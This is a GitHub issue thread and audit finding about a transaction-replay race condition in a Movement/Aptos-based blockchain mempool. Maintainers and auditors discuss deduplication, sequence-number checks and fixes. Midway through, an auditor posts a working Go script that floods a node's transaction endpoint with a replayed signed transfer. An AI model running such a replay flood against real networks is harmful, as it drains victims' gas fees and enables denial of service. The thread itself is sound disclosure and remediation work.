Open SA124 opened 3 weeks ago
Because of the sequence numbers, you shouldn't be able to actually replay transactions here by the time VM execution occurs.
And, ultimately, that's where such replay prevention has to take place. Fundamentally, transaction ingress through to execution QC can't itself be synchronized throughout the network unless the system makes the CP tradeoff under CAP. That is, even if you synchronized the mempool to account for in-flight transactions on a single node, you couldn't have guarantees about the mempools of other nodes without being CP.

However, you can still use this gap to attempt a DOS. I think it would be difficult, however, to run this through a single node in our current setup, because we don't actually pop transactions out of the mempool when piping them through to block building. Instead, we only garbage collect, which currently takes place on a fixed interval appropriate for block execution speed.

Over multiple nodes, this remains a vector for a DOS attack and may add credence to #339. However, we could assess whether the validation performed at the VM level is already performant enough, as the solution would involve tracking transactions in a similar manner.
Our audit is based on the 030fe011da8bd7eca75fa0a37197205767bef7ec commit. Based on our audit, we have the following preliminary knowledge:

a. `vm_validator.validate_transaction()`: validates that a transaction's `sequence_number` is higher than the current `db_sequence_number`.

b. `core_mempool.add_txn()`: validates that a transaction's `sequence_number` is higher than the current `db_sequence_number`.

c. `executor.execute_block()`: validates that a transaction's `sequence_number` must be `db_sequence_number + 1`.

`executor.execute_block()` executes in blocks, meaning that even if the transactions within do not pass validation, they will still be saved to the database along with the block. When `executor.execute_block()` is executed, the sender's gas fee will be deducted for transactions that did not pass validation, because the node needs disk space to store illegal transactions.
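The interaction between these three checks can be sketched as follows. The function names and exact comparisons here are illustrative stand-ins for the behavior described above, not the actual movement/aptos-core code:

```rust
/// a/b: ingress-time check (vm_validator.validate_transaction,
/// core_mempool.add_txn): the transaction's sequence number must not be
/// below what the DB has committed, so a replay of a transaction that has
/// not yet executed still passes.
fn ingress_ok(txn_seq: u64, db_seq: u64) -> bool {
    txn_seq >= db_seq
}

/// c: execution check (executor.execute_block): exactly the next
/// sequence number is accepted.
fn execute_ok(txn_seq: u64, db_seq: u64) -> bool {
    txn_seq == db_seq + 1
}

fn main() {
    let mut db_seq = 0u64;
    // Ten identical copies of a transaction with sequence number 1.
    let copies = [1u64; 10];
    let mut executed = 0;
    for &seq in &copies {
        assert!(ingress_ok(seq, db_seq)); // all ten clear ingress
        if execute_ok(seq, db_seq) {
            executed += 1;
            db_seq = seq; // account state advances only on success
        }
        // Failed copies are still stored in the block and charged gas.
    }
    assert_eq!(executed, 1); // only the first copy executes
}
```

The sketch shows the race: the ingress check only rules out already-committed sequence numbers, while the execution check demands exactly the next one, so identical replays clear ingress but fail (and are still stored and charged) at execution.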
(Of course, there is a vulnerability here where the gas fee is not deducted; see https://github.com/movementlabsxyz/movement/issues/409.)

Therefore, we can exploit this race condition vulnerability to launch an attack:
These 10 identical transactions will pass the `vm_validator.validate_transaction()` and `core_mempool.add_txn()` validations and will be packaged into a block. In the `executor.execute_block()` phase, only the first Tx will be successfully executed, while the other 9 will fail. Even if they fail, these 9 transactions will still be included in the block and stored, and the gas fee will be deducted from victim V.

We have verified through a locally deployed test environment that the replay transaction issue exists.
> These 10 identical transactions will pass the `vm_validator.validate_transaction()` and `core_mempool.add_txn()` validations and will be packaged into a block.
They will not be packaged into a block if they are identical. Blocks have B-Tree Sets as their transaction container. At some point during ingress, serialization, or deserialization, duplicates will be removed by honest nodes.
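For illustration, a minimal sketch of the deduplication a `BTreeSet` transaction container would give. The `Tx` type here is a hypothetical stand-in, not the real transaction type; deduplication only requires that it derive `Ord`:

```rust
use std::collections::BTreeSet;

// Minimal stand-in for a transaction; BTreeSet dedup only needs Ord.
#[derive(PartialEq, Eq, PartialOrd, Ord)]
struct Tx {
    sender: [u8; 4],
    sequence_number: u64,
    payload: Vec<u8>,
}

fn main() {
    let mut block_txs: BTreeSet<Tx> = BTreeSet::new();
    for _ in 0..10 {
        // Ten byte-identical replays compare equal, so only one is kept.
        block_txs.insert(Tx {
            sender: [0; 4],
            sequence_number: 0,
            payload: vec![1, 2, 3],
        });
    }
    assert_eq!(block_txs.len(), 1);
}
```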
Would you be able to share the scripts and configuration of your local environment?
This can happen if the transactions are included in different blocks, which could be achieved via particular timing or sending to different nodes.
So, when we turn on #409 we will have to have solved this.
> via particular timing
The particular timing here would presumably need to be that the transaction has been garbage collected, but not yet executed, since we don't pop transactions out of the mempool.
Hi, we built a docker environment based on the 030fe011da8bd7eca75fa0a37197205767bef7ec commit.
```go
package main

import (
	"bytes"
	"encoding/json"
	"fmt"
	"io"
	"log"
	"net/http"
	"sync"
	"time"
)

const url = "http://127.0.0.1:30731/v1/transactions"

var requestPayload = map[string]interface{}{
	"sender":                    "0x60b5f67bb14334b371f207df24d6f717e50941a67f84db471d661de5140e23c9",
	"sequence_number":           "0",
	"max_gas_amount":            "1498",
	"gas_unit_price":            "100",
	"expiration_timestamp_secs": "1755253215",
	"payload": map[string]interface{}{
		"function":       "0x1::aptos_account::transfer",
		"type":           "entry_function_payload",
		"type_arguments": []interface{}{},
		"arguments": []interface{}{
			"0x60b5f67bb14334b371f207df24d6f717e50941a67f84db471d661de5140e23c8",
			"100",
		},
	},
	"signature": map[string]interface{}{
		"type":       "ed25519_signature",
		"public_key": "0x18367b2687ee313cc3baea86d31619e5bef1158df4bb0f6d2476a9601e978ae2",
		"signature":  "0x771e15db6f57c9793db583e8a4cbe13d1a95ca47f1fcf375adb0728abc5f8b77a43de5a20bf699876d63f78418f87c257717dc5a0a24789af0ec79c1cf13af0f",
	},
}

var requestPayload2 = map[string]interface{}{
	"sender":                    "0x60b5f67bb14334b371f207df24d6f717e50941a67f84db471d661de5140e23c9",
	"sequence_number":           "2",
	"max_gas_amount":            "13",
	"gas_unit_price":            "100",
	"expiration_timestamp_secs": "1755308158",
	"payload": map[string]interface{}{
		"function":       "0x1::aptos_account::transfer",
		"type":           "entry_function_payload",
		"type_arguments": []interface{}{},
		"arguments": []interface{}{
			"0x60b5f67bb14334b371f207df24d6f717e50941a67f84db471d661de5140e23c8",
			"100",
		},
	},
	"signature": map[string]interface{}{
		"type":       "ed25519_signature",
		"public_key": "0x18367b2687ee313cc3baea86d31619e5bef1158df4bb0f6d2476a9601e978ae2",
		"signature":  "0x45e9e00617dc0af6160412bada9588853e4a9cb7aea893e202efcfc37c735d9233b108f61b889e0a46e81860554df68611b807db24550efb5051e96617465503",
	},
}

func sendRequest(wg *sync.WaitGroup, requestPayload map[string]interface{}, i int) {
	defer wg.Done()
	// Note: this marshals requestPayload2, ignoring the requestPayload parameter.
	jsonData, err := json.Marshal(requestPayload2)
	if err != nil {
		log.Println("Error marshalling JSON:", err)
		return
	}
	resp, err := http.Post(url, "application/json", bytes.NewBuffer(jsonData))
	if err != nil {
		log.Println("Error sending request:", err)
		return
	}
	defer resp.Body.Close()
	body, err := io.ReadAll(resp.Body)
	if err != nil {
		log.Println("Error reading response body:", err)
		return
	}
	// fmt.Printf("Response Status: %s\n", resp.Status)
	fmt.Printf("%d Response Body: %s\n", i, body)
}

func main() {
	var wg sync.WaitGroup
	numRequests := 200000000
	for i := 0; i < numRequests; i++ {
		wg.Add(1)
		time.Sleep(100 * time.Millisecond)
		go sendRequest(&wg, requestPayload, i)
	}
	wg.Wait()
}
```
The above Golang source code is the attacking code.
> These 10 identical transactions will pass the `vm_validator.validate_transaction()` and `core_mempool.add_txn()` validations and will be packaged into a block.
>
> They will not be packaged into a block if they are identical. Blocks have B-Tree Sets as their transaction container. At some point during ingress, serialization, or deserialization, duplicates will be removed by honest nodes.
Hello,
This is the Tx in the light-node Mempool:

```rust
pub struct MempoolTransaction {
    pub transaction: Transaction,
    pub timestamp: u64,
    pub slot_seconds: u64,
}
```

The replay Tx is:

```rust
pub struct Transaction {
    pub data: Vec<u8>,
    pub sequence_number: u64,
    pub id: Id,
}
```

The Block is:

```rust
pub struct Block {
    pub metadata: BlockMetadata,
    pub parent: Vec<u8>,
    pub transactions: Vec<Transaction>,
    pub id: Id,
}
```

There is no B-Tree Set.
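To make the difference concrete, here is a small sketch, with a minimal stand-in `Tx` type, of why a `Vec` transaction container keeps replayed duplicates that a `BTreeSet` container would collapse:

```rust
use std::collections::BTreeSet;

// Minimal stand-in for the Transaction struct above.
#[derive(Clone, PartialEq, Eq, PartialOrd, Ord)]
struct Tx {
    data: Vec<u8>,
    sequence_number: u64,
}

fn main() {
    let replay = Tx { data: vec![0xAB], sequence_number: 0 };

    // Vec<Transaction>, as in the Block struct: all ten copies remain.
    let as_vec: Vec<Tx> = vec![replay.clone(); 10];
    assert_eq!(as_vec.len(), 10);

    // A BTreeSet container would have deduplicated them.
    let as_set: BTreeSet<Tx> = as_vec.into_iter().collect();
    assert_eq!(as_set.len(), 1);
}
```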
@poetyellow
My bad, I guess that must have been factored out at some point. It also looks like the usage of a `BTreeSet` in the Memseq in-memory buffer, along with the whole buffer, is no longer extant despite a lingering comment.
The other thing is that RocksDB uniqueness doesn't help us here because we are creating a key from the wrapped mempool transaction: https://github.com/movementlabsxyz/movement/blob/31386f74a2700920fec093775c221acdc9c6c7a2/protocol-units/mempool/move-rocks/src/lib.rs#L37
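A sketch of that problem, using hypothetical types and a made-up key derivation rather than the actual move-rocks serialization: because the key is derived from the wrapper (which carries a timestamp) rather than from the inner transaction, two replays of the same transaction produce distinct keys and both get stored.

```rust
// Hypothetical, simplified shape of the wrapped mempool transaction.
struct MempoolTransaction {
    transaction_bytes: Vec<u8>,
    timestamp: u64,
}

// Illustrative key derivation from the whole wrapper, not the inner tx.
fn key_from_wrapper(m: &MempoolTransaction) -> Vec<u8> {
    let mut k = m.transaction_bytes.clone();
    k.extend_from_slice(&m.timestamp.to_be_bytes());
    k
}

fn main() {
    let first = MempoolTransaction { transaction_bytes: vec![1, 2, 3], timestamp: 100 };
    let replay = MempoolTransaction { transaction_bytes: vec![1, 2, 3], timestamp: 105 };

    // Same inner transaction, but the wrapper-derived keys differ,
    // so RocksDB key uniqueness does not reject the replay.
    assert_ne!(key_from_wrapper(&first), key_from_wrapper(&replay));

    // Keying on the inner transaction bytes alone would have caught it.
    assert_eq!(first.transaction_bytes, replay.transaction_bytes);
}
```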
I believe the safety of each of the approaches alluded to in this thread is something like:

1. The `move-rocks` uniqueness check does not help, because the key is derived from the wrapped mempool transaction, so duplicates still enter the pool.
2. The `BTreeSet` approach will account for the replay attack when the replay transactions would be placed in the same block, but not across blocks.
3. DB-based validation after passing through the DA is safe w.r.t. this issue, but opens up more potential for DOS. You would still want the `BTreeSet` to make sure it doesn't happen within a block.

The problem is, however, that you're still doing a fair bit of work on every node for this transaction. Per my comment about CP earlier though, I don't think there's a good way around this. The best thing to do would probably be to position the mempool for independent scaling. We are also fundamentally accepting a fair bit of DOS risk by using a permissionless, public DA in the first place. So, some tolerance for this risk is presumed. @mzabaluev Going to move some of this over to our #475 while we're undecided on the best course of action here.
> The above Golang source code is the attacking code.

I think this needs cleanup. `requestPayload2` is the actual request that gets sent repeatedly while `requestPayload` is ignored. Is that how it should be?
> 3. DB-based validation after passing through the DA is safe w.r.t. this issue, but opens up more potential for DOS.

I have filed #526 to check if we can avoid this.
3. We can get the transaction by hash from the AptosDB; it will have been called here during execution. If the transaction was previously included, we could filter it out of the blocks.
Would a transaction lookup be sufficient with pruning enabled? If an attacker sends a sufficiently old transaction, it would have been pruned from the DB.
> Would a transaction lookup be sufficient with pruning enabled? If an attacker sends a sufficiently old transaction, it would have been pruned from the DB.
In theory, by this point, the account sequence number check in the mempool is sufficient.
The only reason to use the `transaction_by_hash` check instead of `account_sequence_number` for the filtering is that you might want to charge, and thereby deter, the honest user for trying to aggressively send transactions that are close to the correct sequence number. You can do this by letting those transactions through the very first time to have them aborted in the VM.

Later on, i.e., after pruning, the mempool would check the account sequence number and deny these transactions up front. That loses the deterrence aspect. But, based on how far off their sequence number is, it's more likely these transactions are just purely fraudulent.
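A rough sketch of the two filtering strategies and their tradeoff. All names here are illustrative, not the real APIs:

```rust
use std::collections::BTreeSet;

/// Sequence-number filter: reject anything at or below the committed
/// sequence number. Cheap and pruning-proof, but denies near-miss
/// transactions up front, losing the deterrence (gas-charging) aspect.
fn passes_seq_filter(txn_seq: u64, committed_seq: u64) -> bool {
    txn_seq > committed_seq
}

/// Hash filter: reject only exact replays whose hash we have already
/// seen. Lets a close-but-wrong sequence number through once, to be
/// aborted (and charged) in the VM. Blind to hashes pruned from the DB.
fn passes_hash_filter(txn_hash: [u8; 32], seen: &BTreeSet<[u8; 32]>) -> bool {
    !seen.contains(&txn_hash)
}

fn main() {
    // A replay of an already-committed transaction (seq 3, committed 5)
    // is stopped by the sequence-number filter.
    assert!(!passes_seq_filter(3, 5));

    // The same replay passes the hash filter once its hash is pruned.
    let pruned_history: BTreeSet<[u8; 32]> = BTreeSet::new();
    assert!(passes_hash_filter([0u8; 32], &pruned_history));
}
```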
Thanks @l-monninger. I agree the `transaction_by_hash` check will solve the replay problem at some added runtime cost.
This bit looks like it should be teachable to the users:

> you might want to charge and deter the honest user for trying to aggressively send transactions that are close to the correct sequence number.
I believe #542 and #502 resolve this, though we still need to recreate the test in our test harness. @poetyellow, should we reach out in a separate channel about re-reviewing?
LIB1-1 Multithreading Issue Leads to Transaction Replay Vulnerability
Auditor: Movebit
Code: Aptos Core
Severity: Critical
Discovery Methods: Manual Review
Status: Pending
Code Location: protocol-units/mempool/util/src/lib.rs#50; protocol-units/da/m1/light-node/src/v1/sequencer.rs#76; networks/suzuka/suzuka-full-node/src/partial.rs#134
Description: In the light-node, when adding a transaction to the mempool, the mempool_util::MempoolTransactionOperations::add_transaction function is called, as shown below:
This function checks whether the transaction already exists to prevent replay attacks. However, this check can be bypassed. The tick_write_transactions_to_da thread of the full-node is responsible for writing transactions to the mempool, while the run_block_proposer thread is responsible for popping transactions out of the mempool and sending them to the DA. If a transaction A is popped out, it no longer exists in the mempool, and it can be re-added to the mempool. The prerequisite for this attack is that transaction A has not yet been executed, but this condition is easily met because the speed of writing to the mempool is faster than the speed of executing blocks.

Impact: Under normal circumstances, repeated transactions that are packaged into a block will not execute successfully but will consume gas fees. A third-party attacker can exploit this by replaying a large number of user transactions, resulting in asset loss for the victim.
Suggestion: The fix is quite complex; it is recommended to refer to Aptos's replay prevention mechanism. A simple approach could be to revalidate transactions when packaging a block after the execution of a block.
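A sketch of what such revalidation at block-packaging time might look like, using assumed types and a simplified sequence-number model (starting at 1) rather than the actual movement code:

```rust
use std::collections::{BTreeSet, HashMap};

// Minimal stand-in transaction type for the sketch.
#[derive(Clone, PartialEq, Eq, PartialOrd, Ord)]
struct Tx {
    sender: u64,
    sequence_number: u64,
}

/// Revalidate candidates against the latest committed per-account
/// sequence numbers: drop byte-identical duplicates within the block,
/// and keep only strictly consecutive sequence numbers per sender.
fn revalidate_for_block(candidates: Vec<Tx>, committed: &HashMap<u64, u64>) -> Vec<Tx> {
    let mut seen = BTreeSet::new();
    let mut next: HashMap<u64, u64> = committed.clone();
    let mut out = Vec::new();
    for tx in candidates {
        if !seen.insert(tx.clone()) {
            continue; // duplicate within this block
        }
        // Simplification: first sequence number for a fresh account is 1.
        let expected = next.get(&tx.sender).copied().unwrap_or(0) + 1;
        if tx.sequence_number == expected {
            next.insert(tx.sender, tx.sequence_number);
            out.push(tx);
        } // otherwise: stale or out-of-order, dropped before execution
    }
    out
}

fn main() {
    let committed = HashMap::from([(7u64, 0u64)]); // sender 7 committed through seq 0
    let candidates = vec![
        Tx { sender: 7, sequence_number: 1 },
        Tx { sender: 7, sequence_number: 1 }, // replay, dropped
        Tx { sender: 7, sequence_number: 2 },
    ];
    let kept = revalidate_for_block(candidates, &committed);
    assert_eq!(kept.len(), 2);
}
```

With this kind of filter in the block proposer, replays never reach execution, so they are neither stored nor charged, at the cost of re-running the sequence-number bookkeeping per block.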